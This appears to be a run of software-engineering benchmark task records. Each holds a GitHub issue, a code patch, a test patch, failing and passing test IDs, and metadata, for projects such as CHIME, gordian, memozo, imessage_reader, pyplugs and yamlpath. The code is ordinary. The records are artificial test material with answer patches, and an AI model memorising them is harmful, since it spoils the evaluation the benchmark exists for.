"tests/test_binned.py::TestAscii2D::test_quantity"
] |
[
"tests/test_binned.py::TestAscii1D::test_data",
"tests/test_binned.py::TestAscii1D::test_dimensions",
"tests/test_binned.py::TestAscii1D::test_quantity",
"tests/test_binned.py::TestBinary1D::test_data",
"tests/test_binned.py::TestBinary1D::test_dimensions",
"tests/test_binned.py::TestBinary1D::test_quantity"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-06-22 05:16:22+00:00
|
mit
| 1,851
|
|
CodeForPhilly__chime-418
|
diff --git a/src/penn_chime/models.py b/src/penn_chime/models.py
index da7311f..6582b1c 100644
--- a/src/penn_chime/models.py
+++ b/src/penn_chime/models.py
@@ -9,7 +9,7 @@ from __future__ import annotations
from datetime import date, datetime, timedelta
from logging import INFO, basicConfig, getLogger
from sys import stdout
-from typing import Dict, Generator, Tuple, Sequence,Optional
+from typing import Dict, Generator, Tuple, Sequence, Optional
import numpy as np
import pandas as pd
@@ -66,14 +66,13 @@ class SimSirModel:
intrinsic_growth_rate = get_growth_rate(p.doubling_time)
self.beta = get_beta(intrinsic_growth_rate, gamma, self.susceptible, 0.0)
+ self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
self.i_day = 0 # seed to the full length
- self.beta_t = self.beta
- self.run_projection(p)
+ self.run_projection(p, [(self.beta, p.n_days)])
self.i_day = i_day = int(get_argmin_ds(self.census_df, p.current_hospitalized))
- self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
- self.run_projection(p)
+ self.run_projection(p, self.gen_policy(p))
logger.info('Set i_day = %s', i_day)
p.date_first_hospitalized = p.current_date - timedelta(days=i_day)
@@ -100,7 +99,7 @@ class SimSirModel:
self.beta = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, 0.0)
self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
- self.run_projection(p)
+ self.run_projection(p, self.gen_policy(p))
loss = self.get_loss()
losses[i] = loss
@@ -109,7 +108,7 @@ class SimSirModel:
intrinsic_growth_rate = get_growth_rate(p.doubling_time)
self.beta = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, 0.0)
self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
- self.run_projection(p)
+ self.run_projection(p, self.gen_policy(p))
self.population = p.population
else:
@@ -146,18 +145,35 @@ class SimSirModel:
self.daily_growth_rate = get_growth_rate(p.doubling_time)
self.daily_growth_rate_t = get_growth_rate(self.doubling_time_t)
- def run_projection(self, p):
+ def gen_policy(self, p: Parameters) -> Sequence[Tuple[float, int]]:
+ if p.mitigation_date is not None:
+ mitigation_day = -(p.current_date - p.mitigation_date).days
+ else:
+ mitigation_day = 0
+
+ total_days = self.i_day + p.n_days
+
+ if mitigation_day < -self.i_day:
+ mitigation_day = -self.i_day
+
+ pre_mitigation_days = self.i_day + mitigation_day
+ post_mitigation_days = total_days - pre_mitigation_days
+
+ return [
+ (self.beta, pre_mitigation_days),
+ (self.beta_t, post_mitigation_days),
+ ]
+
+ def run_projection(self, p: Parameters, policy: Sequence[Tuple[float, int]]):
self.raw_df = sim_sir_df(
self.susceptible,
self.infected,
p.recovered,
self.gamma,
-self.i_day,
- self.beta,
- self.i_day,
- self.beta_t,
- p.n_days
+ policy
)
+
self.dispositions_df = build_dispositions_df(self.raw_df, self.rates, p.market_share, p.current_date)
self.admits_df = build_admits_df(self.dispositions_df)
self.census_df = build_census_df(self.admits_df, self.days)
@@ -221,7 +237,7 @@ def sir(
def gen_sir(
- s: float, i: float, r: float, gamma: float, i_day: int, *args
+ s: float, i: float, r: float, gamma: float, i_day: int, policies: Sequence[Tuple[float, int]]
) -> Generator[Tuple[int, float, float, float], None, None]:
"""Simulate SIR model forward in time yielding tuples.
Parameter order has changed to allow multiple (beta, n_days)
@@ -230,8 +246,7 @@ def gen_sir(
s, i, r = (float(v) for v in (s, i, r))
n = s + i + r
d = i_day
- while args:
- beta, n_days, *args = args
+ for beta, n_days in policies:
for _ in range(n_days):
yield d, s, i, r
s, i, r = sir(s, i, r, beta, gamma, n)
@@ -241,11 +256,11 @@ def gen_sir(
def sim_sir_df(
s: float, i: float, r: float,
- gamma: float, i_day: int, *args
+ gamma: float, i_day: int, policies: Sequence[Tuple[float, int]]
) -> pd.DataFrame:
"""Simulate the SIR model forward in time."""
return pd.DataFrame(
- data=gen_sir(s, i, r, gamma, i_day, *args),
+ data=gen_sir(s, i, r, gamma, i_day, policies),
columns=("day", "susceptible", "infected", "recovered"),
)
diff --git a/src/penn_chime/parameters.py b/src/penn_chime/parameters.py
index d9da047..d6c03a0 100644
--- a/src/penn_chime/parameters.py
+++ b/src/penn_chime/parameters.py
@@ -55,6 +55,7 @@ class Parameters:
hospitalized: Disposition,
icu: Disposition,
relative_contact_rate: float,
+ mitigation_date: Optional[date] = None,
ventilated: Disposition,
current_date: date = date.today(),
date_first_hospitalized: Optional[date] = None,
@@ -68,7 +69,6 @@ class Parameters:
region: Optional[Regions] = None,
):
self.current_hospitalized = Positive(value=current_hospitalized)
- self.relative_contact_rate = Rate(value=relative_contact_rate)
Rate(value=hospitalized.rate), Rate(value=icu.rate), Rate(value=ventilated.rate)
StrictlyPositive(value=hospitalized.days), StrictlyPositive(value=icu.days),
@@ -92,6 +92,9 @@ class Parameters:
self.date_first_hospitalized = OptionalDate(value=date_first_hospitalized)
self.doubling_time = OptionalStrictlyPositive(value=doubling_time)
+ self.relative_contact_rate = Rate(value=relative_contact_rate)
+ self.mitigation_date = OptionalDate(value=mitigation_date)
+
self.infectious_days = StrictlyPositive(value=infectious_days)
self.market_share = Rate(value=market_share)
self.max_y_axis = OptionalStrictlyPositive(value=max_y_axis)
diff --git a/src/penn_chime/presentation.py b/src/penn_chime/presentation.py
index 6492e1b..0f50f42 100644
--- a/src/penn_chime/presentation.py
+++ b/src/penn_chime/presentation.py
@@ -11,6 +11,7 @@ from .constants import (
CHANGE_DATE,
DATE_FORMAT,
DOCS_URL,
+ EPSILON,
FLOAT_INPUT_MIN,
FLOAT_INPUT_STEP,
)
@@ -207,6 +208,10 @@ def display_sidebar(st, d: Parameters) -> Parameters:
st_obj, "Date of first hospitalized case - Enter this date to have chime estimate the initial doubling time",
value=d.date_first_hospitalized,
)
+ mitigation_date_input = DateInput(
+ st_obj, "Date of social distancing measures effect (may be delayed from implementation)",
+ value=d.mitigation_date
+ )
relative_contact_pct_input = PercentInput(
st_obj,
"Social distancing (% reduction in social contact going forward)",
@@ -312,7 +317,15 @@ def display_sidebar(st, d: Parameters) -> Parameters:
doubling_time = doubling_time_input()
date_first_hospitalized = None
- relative_contact_rate = relative_contact_pct_input()
+ if st.sidebar.checkbox(
+ "Social distancing measures have been implemented",
+ value=(d.relative_contact_rate > EPSILON)
+ ):
+ mitigation_date = mitigation_date_input()
+ relative_contact_rate = relative_contact_pct_input()
+ else:
+ mitigation_date = None
+ relative_contact_rate = EPSILON
st.sidebar.markdown(
"### Severity Parameters [ℹ]({docs_url}/what-is-chime/parameters#severity-parameters)".format(
@@ -346,6 +359,7 @@ def display_sidebar(st, d: Parameters) -> Parameters:
hospitalized=Disposition(hospitalized_rate, hospitalized_days),
icu=Disposition(icu_rate, icu_days),
relative_contact_rate=relative_contact_rate,
+ mitigation_date=mitigation_date,
ventilated=Disposition(ventilated_rate, ventilated_days),
current_date=current_date,
date_first_hospitalized=date_first_hospitalized,
diff --git a/src/penn_chime/settings.py b/src/penn_chime/settings.py
index 0bd1298..a9ccb34 100644
--- a/src/penn_chime/settings.py
+++ b/src/penn_chime/settings.py
@@ -16,6 +16,7 @@ def get_defaults():
infectious_days=14,
market_share=0.15,
n_days=100,
+ mitigation_date=date.today(),
relative_contact_rate=0.3,
ventilated=Disposition(0.005, 10),
)
|
CodeForPhilly/chime
|
e6ff8aaa0be2be7c27ec9b98611147650d414270
|
diff --git a/tests/conftest.py b/tests/conftest.py
index e822d91..b7cf01f 100644
--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -51,6 +51,7 @@ def DEFAULTS():
doubling_time=4.0,
n_days=60,
market_share=0.15,
+ mitigation_date=datetime(year=2020, month=3, day=28),
relative_contact_rate=0.3,
hospitalized=Disposition(0.025, 7),
icu=Disposition(0.0075, 9),
@@ -65,6 +66,7 @@ def param():
current_hospitalized=100,
doubling_time=6.0,
market_share=0.05,
+ mitigation_date=datetime(year=2020, month=3, day=28),
relative_contact_rate=0.15,
population=500000,
hospitalized=Disposition(0.05, 7),
@@ -81,6 +83,7 @@ def halving_param():
current_hospitalized=100,
doubling_time=6.0,
market_share=0.05,
+ mitigation_date=datetime(year=2020, month=3, day=28),
relative_contact_rate=0.7,
population=500000,
hospitalized=Disposition(0.05, 7),
diff --git a/tests/penn_chime/test_models.py b/tests/penn_chime/test_models.py
index a8c4129..d5e6de2 100644
--- a/tests/penn_chime/test_models.py
+++ b/tests/penn_chime/test_models.py
@@ -3,11 +3,13 @@ from datetime import date
import pytest
import pandas as pd
import numpy as np
+from datetime import timedelta
from src.penn_chime.models import (
sir,
sim_sir_df,
get_growth_rate,
+ SimSirModel,
)
from src.penn_chime.constants import EPSILON
@@ -64,7 +66,7 @@ def test_sim_sir():
Rounding to move fast past decimal place issues
"""
raw_df = sim_sir_df(
- 5, 6, 7, 0.1, 0, 0.1, 40, # s # i # r # gamma # i_day # beta1 # n_days1
+ 5, 6, 7, 0.1, 0, [(0.1, 40)], # s # i # r # gamma # i_day # beta1 # n_days1
)
first = raw_df.iloc[0, :]
@@ -100,6 +102,20 @@ def test_model(model, param):
assert model.r_t == 2.307298374881539
assert model.r_naught == 2.7144686763312222
assert model.doubling_time_t == 7.764405988534983
+ assert model.i_day == 43
+
+
+def test_model_first_hosp_fit(param):
+ param.date_first_hospitalized = param.current_date - timedelta(days=43)
+ param.doubling_time = None
+
+ my_model = SimSirModel(param)
+
+ assert my_model.intrinsic_growth_rate == 0.12246204830937302
+ assert abs(my_model.beta - 4.21501347256401e-07) < EPSILON
+ assert my_model.r_t == 2.307298374881539
+ assert my_model.r_naught == 2.7144686763312222
+ assert my_model.doubling_time_t == 7.764405988534983
def test_model_raw_start(model, param):
|
["model"] social isolation started earlier than model assumes
<!--
Please note: Any changes to the model have a huge impact on rapidly evolving hospital system & public health decisions. The current model has been in use for a while now, and it has been validated against other similar models, so any changes to the model must meet a very high bar.
However, these 2 types of issue reports are very welcome:
- Bugs causing this model to produce invalid results. In this case, please include details and a suggested fix.
- If this model is producing a significantly different result than another well-known epidemiological model. In this case, please include proof of this difference and a suggested fix to our approach.
For questions or early discussion, please join us in [#chime-analysis](https://codeforphilly.org/chat?channel=chime-analysis) in Slack instead.
-->
### Summary
If I understand the model implementation correctly the model is run with beta prior to current date and beta_t after, where beta_t is the beta corrected for social isolation (suppression of contact rate). While this may be true in a new pandemic it is not true in this case: isolation started in many places ~2 weeks ago which is when the first cases started to appear
### Additional details
I am pretty sure what I described is true when the model is run with a given doubling time - not so sure that this is also what happens in the optimized model (when given first hospitalization date)
### Suggested fix
beta_t could be used as a default, or linked to a user input date
|
0.0
|
e6ff8aaa0be2be7c27ec9b98611147650d414270
|
[
"[",
"[100%]",
"tests/penn_chime/test_models.py::test_model_raw_end",
"tests/penn_chime/test_models.py::test_model_conservation",
"tests/penn_chime/test_models.py::test_sim_sir",
"tests/penn_chime/test_models.py::test_model_cumulative_census",
"tests/penn_chime/test_models.py::test_model",
"tests/penn_chime/test_models.py::test_model_first_hosp_fit",
"tests/penn_chime/test_models.py::test_model_monotonicity"
] |
[
"tests/penn_chime/test_models.py::test_growth_rate",
"tests/penn_chime/test_models.py::test_sir"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-04-01 20:18:49+00:00
|
mit
| 146
|
|
argoproj-labs__gordian-42
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index cab46c1..eafba89 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,11 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com),
and this project adheres to [Semantic Versioning](https://semver.org).
+
+## [3.7.0] - 2023-10-18
+### Added
+- Added support to pass in a path when calling get_files(), resolves issue #34
+
## [3.6.0] - 2023-10-06
### Fix
- Fetch repo content from target branch
diff --git a/gordian/repo.py b/gordian/repo.py
index ae72642..0c53a0b 100644
--- a/gordian/repo.py
+++ b/gordian/repo.py
@@ -77,9 +77,9 @@ class Repo:
return PlainTextFile(file, self)
- def get_files(self):
+ def get_files(self, path=''):
if not self.files:
- contents = self._get_repo_contents('')
+ contents = self._get_repo_contents(path)
while contents:
file = contents.pop(0)
|
argoproj-labs/gordian
|
5924837aac8e416abd170bebd8c3ccac614b1fd5
|
diff --git a/tests/test_repo.py b/tests/test_repo.py
index 4398ec0..a341ea1 100644
--- a/tests/test_repo.py
+++ b/tests/test_repo.py
@@ -191,6 +191,16 @@ class TestRepo(unittest.TestCase):
repo._source_repo.delete_file.assert_called_once()
self.assertTrue(repo.dirty)
+ def test_get_files_with_path(self):
+ self.repo._set_target_branch('target')
+ self.repo.files = []
+ self.repo._source_repo = MagicMock()
+ repository_file = MagicMock(path='test/afile.txt', type='not_dir')
+ self.repo._source_repo.get_contents.side_effect = [[MagicMock(path='directory', type='dir')],[repository_file]]
+ self.repo.get_files('test')
+ self.repo._source_repo.get_contents.assert_has_calls([call('test', 'target'), call('directory', 'target')])
+ self.assertEquals(self.repo.files, [repository_file])
+
def test__get_github_client(self):
repo = Repo('test_repo', branch='', github=self.mock_git)
|
Fetching of all files
It appears gordian is fetching all the files of a repo even if you only need 1.
|
0.0
|
5924837aac8e416abd170bebd8c3ccac614b1fd5
|
[
"tests/test_repo.py::TestRepo::test_get_files_with_path"
] |
[
"tests/test_repo.py::TestRepo::test__get_github_client",
"tests/test_repo.py::TestRepo::test_create_file",
"tests/test_repo.py::TestRepo::test_create_pr",
"tests/test_repo.py::TestRepo::test_create_pr_no_labels",
"tests/test_repo.py::TestRepo::test_default_github_url",
"tests/test_repo.py::TestRepo::test_delete_file",
"tests/test_repo.py::TestRepo::test_fork",
"tests/test_repo.py::TestRepo::test_get_existing_object",
"tests/test_repo.py::TestRepo::test_get_files",
"tests/test_repo.py::TestRepo::test_get_new_version_major",
"tests/test_repo.py::TestRepo::test_get_new_version_minor",
"tests/test_repo.py::TestRepo::test_get_new_version_patch",
"tests/test_repo.py::TestRepo::test_get_object_does_not_exist",
"tests/test_repo.py::TestRepo::test_init_with_passed_token",
"tests/test_repo.py::TestRepo::test_init_with_token_from_env",
"tests/test_repo.py::TestRepo::test_init_with_user_pass_env",
"tests/test_repo.py::TestRepo::test_make_branch_fork",
"tests/test_repo.py::TestRepo::test_make_branch_no_fork",
"tests/test_repo.py::TestRepo::test_new_files_object",
"tests/test_repo.py::TestRepo::test_no_fork",
"tests/test_repo.py::TestRepo::test_override_github_url",
"tests/test_repo.py::TestRepo::test_remove_dot_git_from_repo_name",
"tests/test_repo.py::TestRepo::test_set_target_branch",
"tests/test_repo.py::TestRepo::test_set_target_branch_reset_file_cache",
"tests/test_repo.py::TestRepo::test_set_target_branch_source_branch"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-05-16 21:53:32+00:00
|
apache-2.0
| 1,098
|
|
sotetsuk__memozo-21
|
diff --git a/memozo/memozo.py b/memozo/memozo.py
index a67bbe5..e4e3311 100644
--- a/memozo/memozo.py
+++ b/memozo/memozo.py
@@ -76,3 +76,32 @@ class Memozo(object):
return _wrapper
return wrapper
+
+ def pickle(self, name=None, ext='pickle', protocol=None):
+
+ def wrapper(func):
+ _name = func.__name__ if name is None else name
+
+ @functools.wraps(func)
+ def _wrapper(*args, **kwargs):
+ args = utils.get_bound_args(func, *args, **kwargs)
+ args_str = utils.get_args_str(args)
+ sha1 = utils.get_hash(_name, func.__name__, args_str)
+ file_path = os.path.join(self.base_path, "{}_{}.{}".format(_name, sha1, ext))
+
+ if utils.log_exisits(self.base_path, _name, func.__name__, args_str) and os.path.exists(file_path):
+ with open(file_path, 'rb') as f:
+ obj = pickle.load(f)
+ return obj
+
+ obj = func(*args, **kwargs)
+
+ with open(file_path, 'wb') as f:
+ pickle.dump(obj, f, protocol=protocol)
+ utils.write(self.base_path, _name, func.__name__, args_str)
+
+ return obj
+
+ return _wrapper
+
+ return wrapper
|
sotetsuk/memozo
|
a0d0985f445279d2c0ae295e9488556cf6507f9f
|
diff --git a/tests/test_memozo.py b/tests/test_memozo.py
index e224e0a..4c39e59 100644
--- a/tests/test_memozo.py
+++ b/tests/test_memozo.py
@@ -1,6 +1,7 @@
import os
import unittest
import codecs
+import pickle
from memozo import Memozo, utils
@@ -115,3 +116,30 @@ class TestMemozoGenerator(unittest.TestCase):
def test_load_data_from_cache(self):
# TODO(sotetsuk): WRITE THIS TEST
pass
+
+
+class TestMemozoPickle(unittest.TestCase):
+
+ def test_no_cache_output(self):
+ base_path = './tests/resources'
+ m = Memozo(base_path)
+
+ @m.pickle('pickle_test', protocol=pickle.HIGHEST_PROTOCOL)
+ def pickle_test_func():
+ return {'a': 3, 'b': 5}
+
+ expected = {'a': 3, 'b': 5}
+ actual = pickle_test_func()
+ self.assertTrue(actual == expected)
+
+ sha1 = utils.get_hash('pickle_test', 'pickle_test_func', '')
+ file_path = os.path.join(base_path, "{}_{}.{}".format('pickle_test', sha1, 'pickle'))
+ os.remove(file_path)
+
+ def test_data_cached_collectly(self):
+ # TODO(sotetsuk): WRITE THIS TEST
+ pass
+
+ def test_load_data_from_cache(self):
+ # TODO(sotetsuk): WRITE THIS TEST
+ pass
|
implement pickle
```py
@m.pickle()
```
|
0.0
|
a0d0985f445279d2c0ae295e9488556cf6507f9f
|
[
"tests/test_memozo.py::TestMemozoPickle::test_no_cache_output"
] |
[
"tests/test_memozo.py::TestMemozoCall::test_args",
"tests/test_memozo.py::TestMemozoCall::test_call",
"tests/test_memozo.py::TestMemozoCall::test_doc_string",
"tests/test_memozo.py::TestMemozoCall::test_set_name",
"tests/test_memozo.py::TestMemozoGenerator::test_data_cached_collectly",
"tests/test_memozo.py::TestMemozoGenerator::test_load_data_from_cache",
"tests/test_memozo.py::TestMemozoGenerator::test_no_cache_output",
"tests/test_memozo.py::TestMemozoPickle::test_data_cached_collectly",
"tests/test_memozo.py::TestMemozoPickle::test_load_data_from_cache"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-01-20 03:32:25+00:00
|
mit
| 5,603
|
|
niftycode__imessage_reader-12
|
diff --git a/imessage_reader/create_sqlite.py b/imessage_reader/create_sqlite.py
index 2c2aedc..1bf6d24 100644
--- a/imessage_reader/create_sqlite.py
+++ b/imessage_reader/create_sqlite.py
@@ -5,7 +5,7 @@
Create a SQLite3 database containing iMessage data (user id, text, date, service)
Python 3.8+
Date created: April 30th, 2021
-Date modified: August 7th, 2021
+Date modified: August 28th, 2021
"""
import sqlite3
@@ -41,11 +41,12 @@ class CreateDatabase:
message TEXT,
date TEXT,
service TEXT,
- destination_caller_id TEXT)''')
+ destination_caller_id TEXT,
+ is_from_me TEXT)''')
for data in self.imessage_data:
- cur.execute('''INSERT INTO Messages (user_id, message, date, service, destination_caller_id)
- VALUES(?, ?, ?, ?, ?)''', (data.user_id, data.text, data.date, data.service, data.account))
+ cur.execute('''INSERT INTO Messages (user_id, message, date, service, destination_caller_id, is_from_me)
+ VALUES(?, ?, ?, ?, ?, ?)''', (data.user_id, data.text, data.date, data.service, data.account, data.is_from_me))
conn.commit()
cur.close()
diff --git a/imessage_reader/fetch_data.py b/imessage_reader/fetch_data.py
index 30501e1..6e6f0f2 100644
--- a/imessage_reader/fetch_data.py
+++ b/imessage_reader/fetch_data.py
@@ -7,7 +7,7 @@ Python 3.8+
Author: niftycode
Modified by: thecircleisround
Date created: October 8th, 2020
-Date modified: August 6th, 2021
+Date modified: August 28th, 2021
"""
import sys
@@ -28,6 +28,7 @@ class MessageData:
date: str
service: str
account: str
+ is_from_me: str
def __str__(self):
"""
@@ -37,7 +38,8 @@ class MessageData:
f"message: {self.text}\n" \
f"date: {self.date}\n" \
f"service: {self.service}\n" \
- f"destination caller id: {self.account}\n"
+ f"destination caller id: {self.account}\n "\
+ f"is_from_me: {self.is_from_me}\n"
# noinspection PyMethodMayBeStatic
@@ -55,7 +57,8 @@ class FetchData:
"datetime((date / 1000000000) + 978307200, 'unixepoch', 'localtime')," \
"handle.id, " \
"handle.service, " \
- "message.destination_caller_id " \
+ "message.destination_caller_id, " \
+ "message.is_from_me "\
"FROM message " \
"JOIN handle on message.handle_id=handle.ROWID"
@@ -77,7 +80,7 @@ class FetchData:
data = []
for row in rval:
- data.append(MessageData(row[2], row[0], row[1], row[3], row[4]))
+ data.append(MessageData(row[2], row[0], row[1], row[3], row[4], row[5]))
return data
@@ -137,6 +140,8 @@ class FetchData:
dates = []
service = []
account = []
+ is_from_me = []
+
for data in fetched_data:
users.append(data.user_id)
@@ -144,7 +149,8 @@ class FetchData:
dates.append(data.date)
service.append(data.service)
account.append(data.account)
+ is_from_me.append(data.is_from_me)
- data = list(zip(users, messages, dates, service, account))
+ data = list(zip(users, messages, dates, service, account, is_from_me))
return data
diff --git a/imessage_reader/write_excel.py b/imessage_reader/write_excel.py
index 47412f9..3f88a6d 100644
--- a/imessage_reader/write_excel.py
+++ b/imessage_reader/write_excel.py
@@ -6,7 +6,7 @@
Write Excel file containing iMessage data (user id, text, date, service, account)
Python 3.8+
Date created: October 1st, 2020
-Date modified: August 7th, 2021
+Date modified: August 28th, 2021
"""
from datetime import datetime
@@ -40,6 +40,7 @@ class ExelWriter:
dates = []
services = []
accounts = []
+ is_from_me = []
for data in self.imessage_data:
users.append(data.user_id)
@@ -47,6 +48,7 @@ class ExelWriter:
dates.append(data.date)
services.append(data.service)
accounts.append(data.account)
+ is_from_me.append(data.is_from_me)
# Call openpyxl.Workbook() to create a new blank Excel workbook
workbook = openpyxl.Workbook()
@@ -75,6 +77,9 @@ class ExelWriter:
sheet['E1'] = 'Destination Caller ID'
sheet['E1'].font = bold16font
+ sheet['F1'] = 'Is From Me'
+ sheet['F1'].font = bold16font
+
# Write users to 1st column
users_row = 2
for user in users:
@@ -105,6 +110,12 @@ class ExelWriter:
sheet.cell(row=account_row, column=5).value = account
account_row += 1
+ # Write is_from_me to 6th column
+ is_from_me_row = 2
+ for from_me in is_from_me:
+ sheet.cell(row=is_from_me_row, column=6).value = from_me
+ is_from_me_row += 1
+
# Save the workbook (excel file)
try:
workbook.save(self.file_path + f'iMessage-Data_{datetime.now().strftime("%Y-%m-%d")}.xlsx')
|
niftycode/imessage_reader
|
3a972bebf1c16e02e12322d3e81a7ea60400d5a2
|
diff --git a/tests/test_create_sqlite.py b/tests/test_create_sqlite.py
index a0a3f35..673a51c 100644
--- a/tests/test_create_sqlite.py
+++ b/tests/test_create_sqlite.py
@@ -18,7 +18,8 @@ def message_data_one_row():
text='Hello Max!',
date='2021-04-11 17:02:34',
service='iMessage',
- account='+01 555 17172')]
+ account='+01 555 17172',
+ is_from_me = 1)]
return message_data_list
diff --git a/tests/test_message_data.py b/tests/test_message_data.py
index fe8acf8..5b99916 100644
--- a/tests/test_message_data.py
+++ b/tests/test_message_data.py
@@ -14,7 +14,8 @@ def message_data_one_row():
'Hello!',
'2020-10-27 17:19:20',
'SMS',
- '+01 555 17172')
+ '+01 555 17172',
+ 1)
@pytest.fixture(scope='function')
@@ -31,17 +32,19 @@ def initialize_db(tmpdir):
text TEXT UNIQUE,
date TEXT UNIQUE,
service TEXT UNIQUE,
- account TEXT UNIQUE
+ account TEXT UNIQUE,
+ is_from_me INTEGER
);
''')
- cur.execute('''INSERT OR IGNORE INTO message(user_id, text, date, service, account)
- VALUES ( ?, ?, ?, ?, ?)''',
+ cur.execute('''INSERT OR IGNORE INTO message(user_id, text, date, service, account, is_from_me)
+ VALUES ( ?, ?, ?, ?, ?, ?)''',
('max@mustermann.de',
'Hello Kendra!',
'2020-10-27 17:19:20',
'iMessage',
- '+01 555 17172'))
+ '+01 555 17172',
+ 1))
conn.commit()
@@ -54,7 +57,7 @@ def test_message_data(message_data_one_row):
def test_db_data(initialize_db):
- sql_command = 'SELECT user_id, text, date, service, account from message'
+ sql_command = 'SELECT user_id, text, date, service, account, is_from_me from message'
rval = common.fetch_db_data(initialize_db, sql_command)
assert(isinstance(rval, list))
assert(isinstance(rval[0][0], str))
@@ -62,3 +65,4 @@ def test_db_data(initialize_db):
assert (isinstance(rval[0][2], str))
assert (isinstance(rval[0][3], str))
assert (isinstance(rval[0][4], str))
+ assert (isinstance(rval[0][5], int))
diff --git a/tests/test_write_excel.py b/tests/test_write_excel.py
index 8ba4092..aaa6816 100644
--- a/tests/test_write_excel.py
+++ b/tests/test_write_excel.py
@@ -19,7 +19,8 @@ def message_data_one_row():
text='Hello!',
date='2020-10-27 17:19:20',
service='SMS',
- account='+01 555 17172')]
+ account='+01 555 17172',
+ is_from_me=1)]
return message_data_list
|
Add ability to filter sent/received messages
Awesome app! Thanks for putting it together. I've been able to access both the excel and sqlite output it creates to look at my messages. My only problem (right now) is that I can't figure out a way to tell if I sent or received the message. I can filter by `sender` to isolate conversations to an individual text thread but without any context it's hard to tell if I sent the message or received it.
You might be able to use the `is_from_me` column on the `message` table in the original database to add a flag or some logic on it. I'm going to keep looking into a little myself but thanks again for putting this together!
|
0.0
|
3a972bebf1c16e02e12322d3e81a7ea60400d5a2
|
[
"tests/test_create_sqlite.py::test_create_sqlite",
"tests/test_message_data.py::test_message_data",
"tests/test_write_excel.py::test_write_excel"
] |
[
"tests/test_message_data.py::test_db_data"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-08-28 17:04:02+00:00
|
mit
| 4,168
|
|
gahjelle__pyplugs-29
|
diff --git a/pyplugs/_plugins.py b/pyplugs/_plugins.py
index ca0d4d1..38f4434 100644
--- a/pyplugs/_plugins.py
+++ b/pyplugs/_plugins.py
@@ -141,7 +141,7 @@ def exists(package: str, plugin: str) -> bool:
try:
_import(package, plugin)
- except _exceptions.UnknownPluginError:
+ except (_exceptions.UnknownPluginError, _exceptions.UnknownPackageError):
return False
else:
return package in _PLUGINS and plugin in _PLUGINS[package]
@@ -175,6 +175,10 @@ def _import(package: str, plugin: str) -> None:
raise _exceptions.UnknownPluginError(
f"Plugin {plugin!r} not found in {package!r}"
) from None
+ elif repr(package) in err.msg: # type: ignore
+ raise _exceptions.UnknownPackageError(
+ f"Package {package!r} does not exist"
+ ) from None
raise
|
gahjelle/pyplugs
|
bd98efd851c820c6bc89e2b8b73f49956ddceb36
|
diff --git a/tests/test_plugins.py b/tests/test_plugins.py
index 35e6f7d..82aea8b 100644
--- a/tests/test_plugins.py
+++ b/tests/test_plugins.py
@@ -81,6 +81,12 @@ def test_exists(plugin_package):
assert pyplugs.exists(plugin_package, "non_existent") is False
+def test_exists_on_non_existing_package():
+ """Test that exists() correctly returns False for non-existing packages"""
+ assert pyplugs.exists("non_existent_package", "plugin_parts") is False
+ assert pyplugs.exists("non_existent_package", "non_existent") is False
+
+
def test_call_existing_plugin(plugin_package):
"""Test that calling a test-plugin works, and returns a string"""
plugin_name = pyplugs.names(plugin_package)[0]
|
`.exists()` crashes for non-existing packages
When using `pyplugs.exists()` with a package that doesn't exist, `pyplugs` crashes instead of returning `False`
|
0.0
|
bd98efd851c820c6bc89e2b8b73f49956ddceb36
|
[
"tests/test_plugins.py::test_exists_on_non_existing_package"
] |
[
"tests/test_plugins.py::test_package_not_empty",
"tests/test_plugins.py::test_package_empty",
"tests/test_plugins.py::test_list_funcs",
"tests/test_plugins.py::test_package_non_existing",
"tests/test_plugins.py::test_plugin_exists",
"tests/test_plugins.py::test_plugin_not_exists[no_plugins]",
"tests/test_plugins.py::test_plugin_not_exists[non_existent]",
"tests/test_plugins.py::test_exists",
"tests/test_plugins.py::test_call_existing_plugin",
"tests/test_plugins.py::test_call_non_existing_plugin",
"tests/test_plugins.py::test_ordered_plugin",
"tests/test_plugins.py::test_default_part",
"tests/test_plugins.py::test_call_non_existing_func",
"tests/test_plugins.py::test_short_doc",
"tests/test_plugins.py::test_long_doc",
"tests/test_plugins.py::test_names_factory",
"tests/test_plugins.py::test_funcs_factory",
"tests/test_plugins.py::test_info_factory",
"tests/test_plugins.py::test_exists_factory",
"tests/test_plugins.py::test_get_factory",
"tests/test_plugins.py::test_call_factory"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-04-18 09:58:01+00:00
|
mit
| 2,432
|
|
wwkimball__yamlpath-155
|
diff --git a/CHANGES b/CHANGES
index 1e09b97..afa9061 100644
--- a/CHANGES
+++ b/CHANGES
@@ -1,3 +1,8 @@
+3.6.4
+Bug Fixes:
+* Refactored single-star wildcard segment (*) handling to enable filtering
+ matches when subsequent segments exist; this fixes Issue #154.
+
3.6.3
Bug Fixes:
* The eyaml-rotate-keys command-line tool failed to preserve block-style EYAML
diff --git a/yamlpath/__init__.py b/yamlpath/__init__.py
index 17f456c..a47c822 100644
--- a/yamlpath/__init__.py
+++ b/yamlpath/__init__.py
@@ -1,6 +1,6 @@
"""Core YAML Path classes."""
# Establish the version number common to all components
-__version__ = "3.6.3"
+__version__ = "3.6.4"
from yamlpath.yamlpath import YAMLPath
from yamlpath.processor import Processor
